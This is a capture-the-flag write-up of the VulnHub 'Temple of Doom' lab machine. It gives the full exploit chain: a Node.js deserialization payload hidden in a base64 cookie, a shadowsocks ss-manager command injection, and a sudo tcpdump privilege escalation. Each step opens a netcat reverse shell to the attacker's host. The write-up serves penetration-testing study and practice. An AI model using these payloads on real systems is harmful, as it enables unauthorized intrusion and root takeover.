Temple of Doom One – Writeup

Details

This machine is https://www.vulnhub.com/entry/temple-of-doom-1,243/

Recon Phase

As normal I started by locating my target on the network

root@kali:~# nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00044s latency).
MAC Address: 0A:00:27:00:00:16 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00043s latency).
MAC Address: 08:00:27:61:6B:A9 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.00068s latency).
MAC Address: 08:00:27:BB:24:1C (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.84 seconds

Knowing my target was running on 19.168.56.101 I carried out a service discovery scan

root@kali:~# -sV 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00077s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.7 (protocol 2.0)
666/tcp open  http    Node.js Express framework
MAC Address: 08:00:27:BB:24:1C (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.10 seconds

Gaining a shell

The first thing I wanted to check what was running on the webserver so I went to http://192.168.56.101:666 in browser

Screenshot 1

Once I refreshed the page I found instead of getting the same page, I instead got an error

Screenshot 2

I fond the difference between the 2 loads was a cookie had been set

Screenshot 3

I decoded the base64 for it

{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMT"}7

From this I understood the previous error, the json is malformed. There is a missing " before the F of friday, and the 7 at the end should not be there. I corrected them

{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":"Friday, 13 Oct 2018 00:00:00 GMT"}

Which I then encoded back to base64

eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOiJGcmlkYXksIDEzIE9jdCAyMDE4IDAwOjAwOjAwIEdNVCJ9

I then set it as the cookie value, I also had to increase the expiration time for it to work

Screenshot 4

Upon refreshing the page

Screenshot 5

Now from the previous error, I knew that the cookie was being passed into serialization functions, and after a bit of research I found a potential exploit https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/

But before exploitation I needed a listener to receive a reverse shell

root@kali:~# nc -nlvp 4444

With the listener ready to go, I crafted an exploit

{"username":"_$$ND_FUNC$$_function (){require('child_process').exec('nc -e /bin/bash 192.168.56.102 4444');}()","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":"Friday, 13 Oct 2018 00:00:00 GMT"}

Which I encoded to base64

eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbiAoKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnbmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMTAyIDQ0NDQnKTt9KCkiLCJjc3JmdG9rZW4iOiJ1MzJ0NG8zdGIzZ2c0MzFmczM0Z2dkZ2NoanduemEwbD0iLCJFeHBpcmVzPSI6IkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0=

After setting it as the cookie value I refreshed the page

connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 38126
$ whoami
nodeadmin

Priv Esc

I now had a shell, but I wanted a nicer one so I spawned a tty shell

$ python -c "import pty;pty.spawn('/bin/bash')"
[nodeadmin@localhost ~]$

With my shell ready to go I began to dig, looking first at the users list

[nodeadmin@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
systemd-coredump:x:999:996:systemd Core Dumper:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
geoclue:x:997:993:User for geoclue:/var/lib/geoclue:/sbin/nologin
colord:x:996:992:User for colord:/var/lib/colord:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gluster:x:995:989:GlusterFS daemons:/run/gluster:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
chrony:x:994:988::/var/lib/chrony:/sbin/nologin
dnsmasq:x:987:987:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
openvpn:x:986:986:OpenVPN:/etc/openvpn:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
saslauth:x:985:76:Saslauthd user:/run/saslauthd:/sbin/nologin
nm-openvpn:x:984:983:Default user for running openvpn spawned by NetworkManager:/:/sbin/nologin
nm-openconnect:x:983:982:NetworkManager user for OpenConnect:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
pipewire:x:982:980:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
gnome-initial-setup:x:981:979::/run/gnome-initial-setup/:/sbin/nologin
vboxadd:x:980:1::/var/run/vboxadd:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nginx:x:979:977:Nginx web server:/var/lib/nginx:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:976:Webalizer:/var/www/usage:/sbin/nologin
nodeadmin:x:1001:1001::/home/nodeadmin:/bin/bash
fireman:x:1002:1002::/home/fireman:/bin/bash

From this list, it looked like my first target would be the fireman account, so I started to dig into files

[nodeadmin@localhost ~]$ ls -la
drwx------. 5 nodeadmin nodeadmin 4096 Jun  7 23:05 .
drwxr-xr-x. 4 root      root      4096 Jun  2 23:02 ..
-rw-------. 1 nodeadmin nodeadmin    1 Jun  7 23:04 .bash_history
-rw-r--r--. 1 nodeadmin nodeadmin   18 Mar 15 09:56 .bash_logout
-rw-r--r--. 1 nodeadmin nodeadmin  193 Mar 15 09:56 .bash_profile
-rw-r--r--. 1 nodeadmin nodeadmin  231 Mar 15 09:56 .bashrc
drwx------  3 nodeadmin nodeadmin 4096 Jun  1 13:24 .config
-rw-------  1 nodeadmin nodeadmin   16 Jun  3 16:41 .esd_auth
drwxr-xr-x  4 nodeadmin nodeadmin 4096 Jun  3 00:58 .forever
drwxrwxr-x. 3 nodeadmin nodeadmin 4096 May 30 17:44 .web
[nodeadmin@localhost ~]$ cd /home
[nodeadmin@localhost home]$ ls -la
drwxr-xr-x.  4 root      root      4096 Jun  2 23:02 .
dr-xr-xr-x. 18 root      root      4096 May 30 18:43 ..
drwx------   6 fireman   fireman   4096 Jun  7 23:10 fireman
drwx------.  5 nodeadmin nodeadmin 4096 Jun  7 23:05 nodeadmin

So I had no access to the accounts files, so I instead looked for any processes running as the user which I may be able to take over

[nodeadmin@localhost ~]$ ps -aux | grep fireman
root       830  0.0  0.0 301464  4228 ?        S    09:47   0:00 su fireman -c /usr/local/bin/ss-manager
fireman    836  0.0  0.0  37060  3788 ?        Ss   09:47   0:00 /usr/local/bin/ss-manager
nodeadm+   944  0.0  0.0 213788  1052 pts/0    S+   09:51   0:00 grep --color=auto fireman

From this I was able to find a potential exploit against the ss-manager program https://www.exploit-db.com/exploits/43006/. To use it I needed a second listener

root@kali:~# nc -nlvp 1234

With it ready to go I setup the exploit

[nodeadmin@localhost ~]$ nc -u 127.0.0.1 8839
$ add: {"server_port":8003, "password":"test", "method":"||nc -e /bin/bash 192.168.56.102 1234||"}

Back on the listener

connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 38012
$ whoami
fireman

I now had a shell as fireman, I used the python trick to get a tty

$ python -c "import pty;pty.spawn('/bin/bash')"
[fireman@localhost root]$

I then went over to the home dir as I would now be able to access it

[fireman@localhost root]$ cd /home/fireman
[fireman@localhost ~]$ ls -la
drwx------  6 fireman fireman 4096 Jun  7 23:10 .
drwxr-xr-x. 4 root    root    4096 Jun  2 23:02 ..
-rw-------  1 fireman fireman 2151 Jun  7 22:33 .bash_history
-rw-r--r--  1 fireman fireman   18 Mar 15 09:56 .bash_logout
-rw-r--r--  1 fireman fireman  193 Mar 15 09:56 .bash_profile
-rw-r--r--  1 fireman fireman  231 Mar 15 09:56 .bashrc
drwx------  3 fireman fireman 4096 Jun  3 01:12 .config
-rw-------  1 fireman fireman   16 Jun  3 01:12 .esd_auth
drwxr-xr-x  4 fireman fireman 4096 Apr 25 02:33 .mozilla
drwxrwxr-x  2 fireman fireman 4096 Jun  3 01:55 .shadowsocks
drwx------  2 fireman fireman 4096 Jun  2 22:39 .ssh

With nothing helpful here I decided to see if I had any sudo privs

[fireman@localhost ~]$ sudo -l
Matching Defaults entries for fireman on localhost:
    !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
    LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
    LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fireman may run the following commands on localhost:
    (ALL) NOPASSWD: /sbin/iptables
    (ALL) NOPASSWD: /usr/bin/nmcli
    (ALL) NOPASSWD: /usr/sbin/tcpdump

Tcpdump instantly jumped out to me as I knew it can run commands, so I needed another listener

root@kali:~# nc -nvlp 6666

And began to setup the exploit

[fireman@localhost ~]$ echo "nc -e /bin/bash 192.168.56.102 6666" > /tmp/shell.sh
[fireman@localhost ~]$ chmod +x /tmp/shell.sh

Ready to go with the exploit in a file and the listener running, I used tcpdump to trigger the exploit

[fireman@localhost ~]$ sudo -u root tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root

And back on the listener

connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 35394
# whoami
root

I had a root shell! From here I spawned a tty again before grabbing the flag

# python -c "import pty;pty.spawn('/bin/bash')"
[root@localhost fireman]# cd /root
[root@localhost ~]# ls -la
dr-xr-x---. 10 root root  4096 Jun  7 23:12 .
dr-xr-xr-x. 18 root root  4096 May 30 18:43 ..
-rw-------   1 root root   130 Jun  7 23:21 .bash_history
-rw-r--r--.  1 root root    18 Feb  9 09:26 .bash_logout
-rw-r--r--.  1 root root   176 Feb  9 09:26 .bash_profile
-rw-r--r--.  1 root root   176 Feb  9 09:26 .bashrc
drwx------.  3 root root  4096 Jun  1 21:01 .cache
drwxrwx---.  4 root root  4096 May 30 10:42 .config
-rw-r--r--.  1 root root   100 Feb  9 09:26 .cshrc
drwx------.  3 root root  4096 May 30 11:21 .dbus
-rw-------.  1 root root    16 May 30 10:42 .esd_auth
-rw-r--r--   1 root root  1993 Jun  7 23:16 flag.txt
-rw-r--r--   1 root root 12288 Jun  3 18:18 .flag.txt.swp
drwxr-xr-x   4 root root  4096 Jun  3 01:39 .forever
-rw-------   1 root root  1389 Jun  2 19:47 .mysql_history
drwxr-xr-x.  5 1000 1000  4096 May 30 17:37 .npm
drwxr-----.  3 root root  4096 May 30 11:38 .pki
drwxr-xr-x   2 root root  4096 Jun  1 23:29 .shadowsocks
drwx------   2 root root  4096 Jun  7 22:33 .ssh
-rw-------.  1 root root     0 May 30 11:21 .Xauthority
[root@localhost ~]# cat flag.txt
[+] You're a soldier.
[+] One of the best that the world could set against
[+] the demonic invasion.
+-----------------------------------------------------------------------------+
| |       |\                                           -~ /     \  /          |
|~~__     | \                                         | \/       /\          /|
|    --   |  \                                        | / \    /    \     /   |
|      |~_|   \                                   \___|/    \/         /      |
|--__  |   -- |\________________________________/~~\~~|    /  \     /     \   |
|   |~~--__  |~_|____|____|____|____|____|____|/ /  \/|\ /      \/          \/|
|   |      |~--_|__|____|____|____|____|____|_/ /|    |/ \    /   \       /   |
|___|______|__|_||____|____|____|____|____|__[]/_|----|    \/       \  /      |
|  \mmmm :   | _|___|____|____|____|____|____|___|  /\|   /  \      /  \      |
|      B :_--~~ |_|____|____|____|____|____|____|  |  |\/      \ /        \   |
|  __--P :  |  /                                /  /  | \     /  \          /\|
|~~  |   :  | /                                 ~~~   |  \  /      \      /   |
|    |      |/                        .-.             |  /\          \  /     |
|    |      /                        |   |            |/   \          /\      |
|    |     /                        |     |            -_   \       /    \    |
+-----------------------------------------------------------------------------+
|          |  /|  |   |  2  3  4  | /~~~~~\ |       /|    |_| ....  ......... |
|          |  ~|~ | % |           | | ~J~ | |       ~|~ % |_| ....  ......... |
|   AMMO   |  HEALTH  |  5  6  7  |  \===/  |    ARMOR    |#| ....  ......... |
+-----------------------------------------------------------------------------+
        FLAG: kre0cu4jl4rzjicpo1i7z5l1
[+] Congratulations on completing this VM & I hope you enjoyed my first boot2root.
[+] You can follow me on twitter: @0katz
[+] Thanks to the homie: @Pink_P4nther

And with that the machine was done!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.